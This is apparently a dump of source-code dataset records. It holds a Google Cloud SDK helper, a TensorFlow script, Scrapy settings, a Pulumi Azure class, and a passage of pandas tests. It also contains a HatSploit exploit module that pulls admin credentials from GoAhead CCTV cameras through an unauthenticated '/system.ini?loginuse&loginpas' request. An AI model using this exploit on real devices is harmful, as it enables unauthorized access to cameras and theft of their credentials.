blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
616
| content_id
stringlengths 40
40
| detected_licenses
sequencelengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 777
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 149
values | src_encoding
stringclasses 26
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 3
10.2M
| extension
stringclasses 188
values | content
stringlengths 3
10.2M
| authors
sequencelengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
7fe354c98d8d01ba22505c5e5c51b733782f34d6 | a3cc7286d4a319cb76f3a44a593c4a18e5ddc104 | /lib/googlecloudsdk/api_lib/ml/vision/util.py | d48320c61c682ef73501c2c44fe8ff497a756db5 | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | jordanistan/Google-Cloud-SDK | f2c6bb7abc2f33b9dfaec5de792aa1be91154099 | 42b9d7914c36a30d1e4b84ae2925df7edeca9962 | refs/heads/master | 2023-09-01T01:24:53.495537 | 2023-08-22T01:12:23 | 2023-08-22T01:12:23 | 127,072,491 | 0 | 1 | NOASSERTION | 2023-08-22T01:12:24 | 2018-03-28T02:31:19 | Python | UTF-8 | Python | false | false | 2,070 | py | # Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utilities for gcloud ml vision commands."""
import os
import re
from googlecloudsdk.api_lib.util import apis
from googlecloudsdk.core import exceptions
VISION_API = 'vision'
VISION_API_VERSION = 'v1'
IMAGE_URI_FORMAT = r'^(https{,1}?|gs)://'
class Error(exceptions.Error):
"""Error for gcloud ml vision commands."""
class ImagePathError(Error):
"""Error if an image path is improperly formatted."""
def GetImageFromPath(path):
"""Builds an Image message from a path.
Args:
path: the path arg given to the command.
Raises:
ImagePathError: if the image path does not exist and does not seem to be
a remote URI.
Returns:
vision_v1_messages.Image: an image message containing information for the
API on the image to analyze.
"""
messages = apis.GetMessagesModule(VISION_API, VISION_API_VERSION)
image = messages.Image()
if os.path.isfile(path):
with open(path, 'rb') as content_file:
image.content = content_file.read()
elif re.match(IMAGE_URI_FORMAT, path):
image.source = messages.ImageSource(imageUri=path)
else:
raise ImagePathError(
'The image path does not exist locally or is not properly formatted. '
'A URI for a remote image must be a Google Cloud Storage image URI, '
'which must be in the form `gs://bucket_name/object_name`, or a '
'publicly accessible image HTTP/HTTPS URL. Please double-check your '
'input and try again.')
return image
| [
"[email protected]"
] | |
14dfa0a6647e1c79cd33c076529270c16b054056 | 09933dafbbc12fe20c405362850ffbf315b01a58 | /src-tag-ent/gen_data.py | fbddab6277c97047553db17485a2206acc0a6875 | [] | no_license | johndpope/advrelation | 1ce1fd4ffc0b7abbea2762c3a8941b469c4f7cf5 | bc77dcfa8669d612aded6a053fff6766798bed14 | refs/heads/master | 2020-03-22T22:55:48.664711 | 2018-03-03T04:43:11 | 2018-03-03T04:43:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,447 | py | import tensorflow as tf
import config as config_lib
from inputs import dataset, semeval_v2
tf.logging.set_verbosity(tf.logging.INFO)
config = config_lib.get_config()
semeval_text = semeval_v2.SemEvalCleanedTextData(
config.semeval_dir, config.semeval_train_file, config.semeval_test_file)
# length statistics
semeval_text.length_statistics()
# gen vocab
vocab = dataset.Vocab(config.out_dir, config.vocab_file)
# vocab.generate_vocab(semeval_text.tokens())
# # trim embedding
# embed = dataset.Embed(config.out_dir, config.trimmed_embed300_file, config.vocab_file)
# google_embed = dataset.Embed(config.pretrain_embed_dir,
# config.google_embed300_file, config.google_words_file)
# embed.trim_pretrain_embedding(google_embed)
# build SemEval record data
semeval_text.set_vocab(vocab)
tag_encoder = dataset.Label(config.semeval_dir, config.semeval_tags_file)
semeval_text.set_tags_encoder(tag_encoder)
semeval_record = semeval_v2.SemEvalCleanedRecordData(semeval_text,
config.out_dir, config.semeval_train_record, config.semeval_test_record)
semeval_record.generate_data()
# INFO:tensorflow:(percent, quantile) [(50, 18.0), (70, 22.0), (80, 25.0),
# (90, 29.0), (95, 34.0), (98, 40.0), (100, 97.0)]
# INFO:tensorflow:generate vocab to data/generated/vocab.txt
# INFO:tensorflow:trim embedding to data/generated/embed300.trim.npy
# INFO:tensorflow:generate TFRecord data
| [
"[email protected]"
] | |
c4fd4774aaf0e10c3720251b62ae4f7fd5eca3ae | 437428a48278b4e9bc04e1b8acbb33199f409376 | /modules/exploit/unix/cctv/goahead_password_disclosure.py | ae2a949fa5f2033187282244644b19db5808d163 | [
"MIT"
] | permissive | happylaodu/HatSploit | 06d18ba2590456241ba61273d9f3d662a8bb26ec | 9d53f3db85ce38483c6e7d16570ac233c5dd93cf | refs/heads/main | 2023-04-30T20:18:37.090185 | 2021-06-02T20:23:08 | 2021-06-02T20:23:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,399 | py | #!/usr/bin/env python3
#
# MIT License
#
# Copyright (c) 2020-2021 EntySec
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
from core.lib.module import Module
from utils.http.http import HTTPClient
from utils.string.string import StringTools
class HatSploitModule(Module, HTTPClient, StringTools):
details = {
'Name': "CCTV GoAhead Camera Password Disclosure",
'Module': "exploit/unix/cctv/goahead_password_disclosure",
'Authors': [
'Ivan Nikolsky (enty8080)',
'Pierre Kim (pierrekim)'
],
'Description': "CCTV GoAhead Camera password disclosure exploit.",
'Comments': [
''
],
'Platform': "unix",
'Risk': "high"
}
options = {
'RHOST': {
'Description': "Remote host.",
'Value': None,
'Type': "ip",
'Required': True
},
'RPORT': {
'Description': "Remote port.",
'Value': 81,
'Type': "port",
'Required': True
},
'USERNAME': {
'Description': "Default username.",
'Value': "admin",
'Type': None,
'Required': True
}
}
def exploit(self, remote_host, remote_port, username):
self.output_process("Generating payload...")
payload = '/system.ini?loginuse&loginpas'
self.output_process("Sending payload...")
response = self.http_request(
method="GET",
host=remote_host,
port=remote_port,
path=payload
)
if response is None or response.status_code != 200:
self.output_error("Failed to send payload!")
return
gathered_data = response.text
strings = self.extract_strings(gathered_data)
if username in strings:
username_index = strings.index(username)
password = strings[username_index + 1]
self.print_table("Credentials", ('Username', 'Password'), (username, password))
else:
self.output_warning(f"Target vulnerable, but default username is not {username}.")
def run(self):
remote_host, remote_port, username = self.parse_options(self.options)
self.output_process(f"Exploiting {remote_host}...")
self.exploit(remote_host, remote_port, username)
| [
"[email protected]"
] | |
ec20e0f130c9b07be9f40df8385ecc71d1678676 | 1b3fc35ada474601a76de3c2908524336d6ca420 | /day07/作业/tencent/tencent/settings.py | d96bd9dfc78cc95ce6fafa6d33a2745ee7a9c4af | [] | no_license | dqsdatalabs/Internet-worm | db3677e65d11542887adcde7719b7652757a3e32 | 62f38f58b4fa7643c482077f5ae18fff6fd81915 | refs/heads/master | 2022-01-16T14:29:52.184528 | 2018-12-25T08:46:08 | 2018-12-25T08:46:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,079 | py | # -*- coding: utf-8 -*-
# Scrapy settings for tencent project
#
# For simplicity, this file contains only settings considered important or
# commonly used. You can find more settings consulting the documentation:
#
# https://doc.scrapy.org/en/latest/topics/settings.html
# https://doc.scrapy.org/en/latest/topics/downloader-middleware.html
# https://doc.scrapy.org/en/latest/topics/spider-middleware.html
BOT_NAME = 'tencent'
SPIDER_MODULES = ['tencent.spiders']
NEWSPIDER_MODULE = 'tencent.spiders'
# Crawl responsibly by identifying yourself (and your website) on the user-agent
#USER_AGENT = 'tencent (+http://www.yourdomain.com)'
# Obey robots.txt rules
ROBOTSTXT_OBEY = False
# Configure maximum concurrent requests performed by Scrapy (default: 16)
#CONCURRENT_REQUESTS = 32
# Configure a delay for requests for the same website (default: 0)
# See https://doc.scrapy.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
#DOWNLOAD_DELAY = 3
# The download delay setting will honor only one of:
#CONCURRENT_REQUESTS_PER_DOMAIN = 16
#CONCURRENT_REQUESTS_PER_IP = 16
# Disable cookies (enabled by default)
COOKIES_ENABLED = False
# Disable Telnet Console (enabled by default)
#TELNETCONSOLE_ENABLED = False
# Override the default request headers:
#DEFAULT_REQUEST_HEADERS = {
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
# 'Accept-Language': 'en',
#}
# Enable or disable spider middlewares
# See https://doc.scrapy.org/en/latest/topics/spider-middleware.html
#SPIDER_MIDDLEWARES = {
# 'tencent.middlewares.TencentSpiderMiddleware': 543,
#}
# Enable or disable downloader middlewares
# See https://doc.scrapy.org/en/latest/topics/downloader-middleware.html
#DOWNLOADER_MIDDLEWARES = {
# 'tencent.middlewares.TencentDownloaderMiddleware': 543,
#}
# Enable or disable extensions
# See https://doc.scrapy.org/en/latest/topics/extensions.html
#EXTENSIONS = {
# 'scrapy.extensions.telnet.TelnetConsole': None,
#}
# Configure item pipelines
# See https://doc.scrapy.org/en/latest/topics/item-pipeline.html
ITEM_PIPELINES = {
'tencent.pipelines.TencentPipeline': 300,
}
# Enable and configure the AutoThrottle extension (disabled by default)
# See https://doc.scrapy.org/en/latest/topics/autothrottle.html
#AUTOTHROTTLE_ENABLED = True
# The initial download delay
#AUTOTHROTTLE_START_DELAY = 5
# The maximum download delay to be set in case of high latencies
#AUTOTHROTTLE_MAX_DELAY = 60
# The average number of requests Scrapy should be sending in parallel to
# each remote server
#AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0
# Enable showing throttling stats for every response received:
#AUTOTHROTTLE_DEBUG = False
# Enable and configure HTTP caching (disabled by default)
# See https://doc.scrapy.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
#HTTPCACHE_ENABLED = True
#HTTPCACHE_EXPIRATION_SECS = 0
#HTTPCACHE_DIR = 'httpcache'
#HTTPCACHE_IGNORE_HTTP_CODES = []
#HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage'
| [
"[email protected]"
] | |
b120a89e2d2dd9e418954d016dc61f794cb03dc7 | 48e124e97cc776feb0ad6d17b9ef1dfa24e2e474 | /sdk/python/pulumi_azure_native/domainregistration/v20201001/domain_ownership_identifier.py | 0686f0d099df8d96bf3e28acd50d6042d8b40850 | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | bpkgoud/pulumi-azure-native | 0817502630062efbc35134410c4a784b61a4736d | a3215fe1b87fba69294f248017b1591767c2b96c | refs/heads/master | 2023-08-29T22:39:49.984212 | 2021-11-15T12:43:41 | 2021-11-15T12:43:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,342 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
__all__ = ['DomainOwnershipIdentifierArgs', 'DomainOwnershipIdentifier']
@pulumi.input_type
class DomainOwnershipIdentifierArgs:
def __init__(__self__, *,
domain_name: pulumi.Input[str],
resource_group_name: pulumi.Input[str],
kind: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
ownership_id: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a DomainOwnershipIdentifier resource.
:param pulumi.Input[str] domain_name: Name of domain.
:param pulumi.Input[str] resource_group_name: Name of the resource group to which the resource belongs.
:param pulumi.Input[str] kind: Kind of resource.
:param pulumi.Input[str] name: Name of identifier.
:param pulumi.Input[str] ownership_id: Ownership Id.
"""
pulumi.set(__self__, "domain_name", domain_name)
pulumi.set(__self__, "resource_group_name", resource_group_name)
if kind is not None:
pulumi.set(__self__, "kind", kind)
if name is not None:
pulumi.set(__self__, "name", name)
if ownership_id is not None:
pulumi.set(__self__, "ownership_id", ownership_id)
@property
@pulumi.getter(name="domainName")
def domain_name(self) -> pulumi.Input[str]:
"""
Name of domain.
"""
return pulumi.get(self, "domain_name")
@domain_name.setter
def domain_name(self, value: pulumi.Input[str]):
pulumi.set(self, "domain_name", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
Name of the resource group to which the resource belongs.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter
def kind(self) -> Optional[pulumi.Input[str]]:
"""
Kind of resource.
"""
return pulumi.get(self, "kind")
@kind.setter
def kind(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "kind", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name of identifier.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="ownershipId")
def ownership_id(self) -> Optional[pulumi.Input[str]]:
"""
Ownership Id.
"""
return pulumi.get(self, "ownership_id")
@ownership_id.setter
def ownership_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ownership_id", value)
class DomainOwnershipIdentifier(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
domain_name: Optional[pulumi.Input[str]] = None,
kind: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
ownership_id: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Domain ownership Identifier.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] domain_name: Name of domain.
:param pulumi.Input[str] kind: Kind of resource.
:param pulumi.Input[str] name: Name of identifier.
:param pulumi.Input[str] ownership_id: Ownership Id.
:param pulumi.Input[str] resource_group_name: Name of the resource group to which the resource belongs.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: DomainOwnershipIdentifierArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Domain ownership Identifier.
:param str resource_name: The name of the resource.
:param DomainOwnershipIdentifierArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(DomainOwnershipIdentifierArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
domain_name: Optional[pulumi.Input[str]] = None,
kind: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
ownership_id: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = DomainOwnershipIdentifierArgs.__new__(DomainOwnershipIdentifierArgs)
if domain_name is None and not opts.urn:
raise TypeError("Missing required property 'domain_name'")
__props__.__dict__["domain_name"] = domain_name
__props__.__dict__["kind"] = kind
__props__.__dict__["name"] = name
__props__.__dict__["ownership_id"] = ownership_id
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["system_data"] = None
__props__.__dict__["type"] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-native:domainregistration:DomainOwnershipIdentifier"), pulumi.Alias(type_="azure-native:domainregistration/v20150401:DomainOwnershipIdentifier"), pulumi.Alias(type_="azure-native:domainregistration/v20180201:DomainOwnershipIdentifier"), pulumi.Alias(type_="azure-native:domainregistration/v20190801:DomainOwnershipIdentifier"), pulumi.Alias(type_="azure-native:domainregistration/v20200601:DomainOwnershipIdentifier"), pulumi.Alias(type_="azure-native:domainregistration/v20200901:DomainOwnershipIdentifier"), pulumi.Alias(type_="azure-native:domainregistration/v20201201:DomainOwnershipIdentifier"), pulumi.Alias(type_="azure-native:domainregistration/v20210101:DomainOwnershipIdentifier"), pulumi.Alias(type_="azure-native:domainregistration/v20210115:DomainOwnershipIdentifier"), pulumi.Alias(type_="azure-native:domainregistration/v20210201:DomainOwnershipIdentifier")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(DomainOwnershipIdentifier, __self__).__init__(
'azure-native:domainregistration/v20201001:DomainOwnershipIdentifier',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'DomainOwnershipIdentifier':
"""
Get an existing DomainOwnershipIdentifier resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = DomainOwnershipIdentifierArgs.__new__(DomainOwnershipIdentifierArgs)
__props__.__dict__["kind"] = None
__props__.__dict__["name"] = None
__props__.__dict__["ownership_id"] = None
__props__.__dict__["system_data"] = None
__props__.__dict__["type"] = None
return DomainOwnershipIdentifier(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def kind(self) -> pulumi.Output[Optional[str]]:
"""
Kind of resource.
"""
return pulumi.get(self, "kind")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Resource Name.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="ownershipId")
def ownership_id(self) -> pulumi.Output[Optional[str]]:
"""
Ownership Id.
"""
return pulumi.get(self, "ownership_id")
@property
@pulumi.getter(name="systemData")
def system_data(self) -> pulumi.Output['outputs.SystemDataResponse']:
"""
The system metadata relating to this resource.
"""
return pulumi.get(self, "system_data")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
Resource type.
"""
return pulumi.get(self, "type")
| [
"[email protected]"
] | |
d5d74faabbe533b0b669c36f2c141f32fc8b63aa | 209a7a4023a9a79693ec1f6e8045646496d1ea71 | /COMP0016_2020_21_Team12-datasetsExperimentsAna/pwa/FADapp/pythonScripts/venv/Lib/site-packages/pandas/tests/arrays/categorical/test_analytics.py | 6aa36525fd6980d29cb1249c01c9b0434bf179be | [
"MIT"
] | permissive | anzhao920/MicrosoftProject15_Invictus | 5e2347015411bbffbdf0ceb059df854661fb240c | 15f44eebb09561acbbe7b6730dfadf141e4c166d | refs/heads/main | 2023-04-16T13:24:39.332492 | 2021-04-27T00:47:13 | 2021-04-27T00:47:13 | 361,913,170 | 0 | 0 | MIT | 2021-04-26T22:41:56 | 2021-04-26T22:41:55 | null | UTF-8 | Python | false | false | 14,794 | py | import re
import sys
import numpy as np
import pytest
from pandas.compat import PYPY
from pandas import Categorical, Index, NaT, Series, date_range
import pandas._testing as tm
from pandas.api.types import is_scalar
class TestCategoricalAnalytics:
@pytest.mark.parametrize("aggregation", ["min", "max"])
def test_min_max_not_ordered_raises(self, aggregation):
# unordered cats have no min/max
cat = Categorical(["a", "b", "c", "d"], ordered=False)
msg = f"Categorical is not ordered for operation {aggregation}"
agg_func = getattr(cat, aggregation)
with pytest.raises(TypeError, match=msg):
agg_func()
def test_min_max_ordered(self):
cat = Categorical(["a", "b", "c", "d"], ordered=True)
_min = cat.min()
_max = cat.max()
assert _min == "a"
assert _max == "d"
cat = Categorical(
["a", "b", "c", "d"], categories=["d", "c", "b", "a"], ordered=True
)
_min = cat.min()
_max = cat.max()
assert _min == "d"
assert _max == "a"
@pytest.mark.parametrize(
"categories,expected",
[
(list("ABC"), np.NaN),
([1, 2, 3], np.NaN),
pytest.param(
Series(date_range("2020-01-01", periods=3), dtype="category"),
NaT,
marks=pytest.mark.xfail(
reason="https://github.com/pandas-dev/pandas/issues/29962"
),
),
],
)
@pytest.mark.parametrize("aggregation", ["min", "max"])
def test_min_max_ordered_empty(self, categories, expected, aggregation):
# GH 30227
cat = Categorical([], categories=categories, ordered=True)
agg_func = getattr(cat, aggregation)
result = agg_func()
assert result is expected
@pytest.mark.parametrize(
"values, categories",
[(["a", "b", "c", np.nan], list("cba")), ([1, 2, 3, np.nan], [3, 2, 1])],
)
@pytest.mark.parametrize("skipna", [True, False])
@pytest.mark.parametrize("function", ["min", "max"])
def test_min_max_with_nan(self, values, categories, function, skipna):
# GH 25303
cat = Categorical(values, categories=categories, ordered=True)
result = getattr(cat, function)(skipna=skipna)
if skipna is False:
assert result is np.nan
else:
expected = categories[0] if function == "min" else categories[2]
assert result == expected
@pytest.mark.parametrize("function", ["min", "max"])
@pytest.mark.parametrize("skipna", [True, False])
def test_min_max_only_nan(self, function, skipna):
# https://github.com/pandas-dev/pandas/issues/33450
cat = Categorical([np.nan], categories=[1, 2], ordered=True)
result = getattr(cat, function)(skipna=skipna)
assert result is np.nan
@pytest.mark.parametrize("method", ["min", "max"])
def test_deprecate_numeric_only_min_max(self, method):
# GH 25303
cat = Categorical(
[np.nan, 1, 2, np.nan], categories=[5, 4, 3, 2, 1], ordered=True
)
with tm.assert_produces_warning(expected_warning=FutureWarning):
getattr(cat, method)(numeric_only=True)
@pytest.mark.parametrize("method", ["min", "max"])
def test_numpy_min_max_raises(self, method):
cat = Categorical(["a", "b", "c", "b"], ordered=False)
msg = (
f"Categorical is not ordered for operation {method}\n"
"you can use .as_ordered() to change the Categorical to an ordered one"
)
method = getattr(np, method)
with pytest.raises(TypeError, match=re.escape(msg)):
method(cat)
@pytest.mark.parametrize("kwarg", ["axis", "out", "keepdims"])
@pytest.mark.parametrize("method", ["min", "max"])
def test_numpy_min_max_unsupported_kwargs_raises(self, method, kwarg):
cat = Categorical(["a", "b", "c", "b"], ordered=True)
msg = (
f"the '{kwarg}' parameter is not supported in the pandas implementation "
f"of {method}"
)
if kwarg == "axis":
msg = r"`axis` must be fewer than the number of dimensions \(1\)"
kwargs = {kwarg: 42}
method = getattr(np, method)
with pytest.raises(ValueError, match=msg):
method(cat, **kwargs)
@pytest.mark.parametrize("method, expected", [("min", "a"), ("max", "c")])
def test_numpy_min_max_axis_equals_none(self, method, expected):
cat = Categorical(["a", "b", "c", "b"], ordered=True)
method = getattr(np, method)
result = method(cat, axis=None)
assert result == expected
@pytest.mark.parametrize(
"values,categories,exp_mode",
[
([1, 1, 2, 4, 5, 5, 5], [5, 4, 3, 2, 1], [5]),
([1, 1, 1, 4, 5, 5, 5], [5, 4, 3, 2, 1], [5, 1]),
([1, 2, 3, 4, 5], [5, 4, 3, 2, 1], [5, 4, 3, 2, 1]),
([np.nan, np.nan, np.nan, 4, 5], [5, 4, 3, 2, 1], [5, 4]),
([np.nan, np.nan, np.nan, 4, 5, 4], [5, 4, 3, 2, 1], [4]),
([np.nan, np.nan, 4, 5, 4], [5, 4, 3, 2, 1], [4]),
],
)
def test_mode(self, values, categories, exp_mode):
s = Categorical(values, categories=categories, ordered=True)
res = s.mode()
exp = Categorical(exp_mode, categories=categories, ordered=True)
tm.assert_categorical_equal(res, exp)
def test_searchsorted(self, ordered):
# https://github.com/pandas-dev/pandas/issues/8420
# https://github.com/pandas-dev/pandas/issues/14522
cat = Categorical(
["cheese", "milk", "apple", "bread", "bread"],
categories=["cheese", "milk", "apple", "bread"],
ordered=ordered,
)
ser = Series(cat)
# Searching for single item argument, side='left' (default)
res_cat = cat.searchsorted("apple")
assert res_cat == 2
assert is_scalar(res_cat)
res_ser = ser.searchsorted("apple")
assert res_ser == 2
assert is_scalar(res_ser)
# Searching for single item array, side='left' (default)
res_cat = cat.searchsorted(["bread"])
res_ser = ser.searchsorted(["bread"])
exp = np.array([3], dtype=np.intp)
tm.assert_numpy_array_equal(res_cat, exp)
tm.assert_numpy_array_equal(res_ser, exp)
# Searching for several items array, side='right'
res_cat = cat.searchsorted(["apple", "bread"], side="right")
res_ser = ser.searchsorted(["apple", "bread"], side="right")
exp = np.array([3, 5], dtype=np.intp)
tm.assert_numpy_array_equal(res_cat, exp)
tm.assert_numpy_array_equal(res_ser, exp)
# Searching for a single value that is not from the Categorical
with pytest.raises(KeyError, match="cucumber"):
cat.searchsorted("cucumber")
with pytest.raises(KeyError, match="cucumber"):
ser.searchsorted("cucumber")
# Searching for multiple values one of each is not from the Categorical
with pytest.raises(KeyError, match="cucumber"):
cat.searchsorted(["bread", "cucumber"])
with pytest.raises(KeyError, match="cucumber"):
ser.searchsorted(["bread", "cucumber"])
def test_unique(self):
# categories are reordered based on value when ordered=False
cat = Categorical(["a", "b"])
exp = Index(["a", "b"])
res = cat.unique()
tm.assert_index_equal(res.categories, exp)
tm.assert_categorical_equal(res, cat)
cat = Categorical(["a", "b", "a", "a"], categories=["a", "b", "c"])
res = cat.unique()
tm.assert_index_equal(res.categories, exp)
tm.assert_categorical_equal(res, Categorical(exp))
cat = Categorical(["c", "a", "b", "a", "a"], categories=["a", "b", "c"])
exp = Index(["c", "a", "b"])
res = cat.unique()
tm.assert_index_equal(res.categories, exp)
exp_cat = Categorical(exp, categories=["c", "a", "b"])
tm.assert_categorical_equal(res, exp_cat)
# nan must be removed
cat = Categorical(["b", np.nan, "b", np.nan, "a"], categories=["a", "b", "c"])
res = cat.unique()
exp = Index(["b", "a"])
tm.assert_index_equal(res.categories, exp)
exp_cat = Categorical(["b", np.nan, "a"], categories=["b", "a"])
tm.assert_categorical_equal(res, exp_cat)
def test_unique_ordered(self):
# keep categories order when ordered=True
cat = Categorical(["b", "a", "b"], categories=["a", "b"], ordered=True)
res = cat.unique()
exp_cat = Categorical(["b", "a"], categories=["a", "b"], ordered=True)
tm.assert_categorical_equal(res, exp_cat)
cat = Categorical(
["c", "b", "a", "a"], categories=["a", "b", "c"], ordered=True
)
res = cat.unique()
exp_cat = Categorical(["c", "b", "a"], categories=["a", "b", "c"], ordered=True)
tm.assert_categorical_equal(res, exp_cat)
cat = Categorical(["b", "a", "a"], categories=["a", "b", "c"], ordered=True)
res = cat.unique()
exp_cat = Categorical(["b", "a"], categories=["a", "b"], ordered=True)
tm.assert_categorical_equal(res, exp_cat)
cat = Categorical(
["b", "b", np.nan, "a"], categories=["a", "b", "c"], ordered=True
)
res = cat.unique()
exp_cat = Categorical(["b", np.nan, "a"], categories=["a", "b"], ordered=True)
tm.assert_categorical_equal(res, exp_cat)
def test_unique_index_series(self):
c = Categorical([3, 1, 2, 2, 1], categories=[3, 2, 1])
# Categorical.unique sorts categories by appearance order
# if ordered=False
exp = Categorical([3, 1, 2], categories=[3, 1, 2])
tm.assert_categorical_equal(c.unique(), exp)
tm.assert_index_equal(Index(c).unique(), Index(exp))
tm.assert_categorical_equal(Series(c).unique(), exp)
c = Categorical([1, 1, 2, 2], categories=[3, 2, 1])
exp = Categorical([1, 2], categories=[1, 2])
tm.assert_categorical_equal(c.unique(), exp)
tm.assert_index_equal(Index(c).unique(), Index(exp))
tm.assert_categorical_equal(Series(c).unique(), exp)
c = Categorical([3, 1, 2, 2, 1], categories=[3, 2, 1], ordered=True)
# Categorical.unique keeps categories order if ordered=True
exp = Categorical([3, 1, 2], categories=[3, 2, 1], ordered=True)
tm.assert_categorical_equal(c.unique(), exp)
tm.assert_index_equal(Index(c).unique(), Index(exp))
tm.assert_categorical_equal(Series(c).unique(), exp)
def test_shift(self):
# GH 9416
cat = Categorical(["a", "b", "c", "d", "a"])
# shift forward
sp1 = cat.shift(1)
xp1 = Categorical([np.nan, "a", "b", "c", "d"])
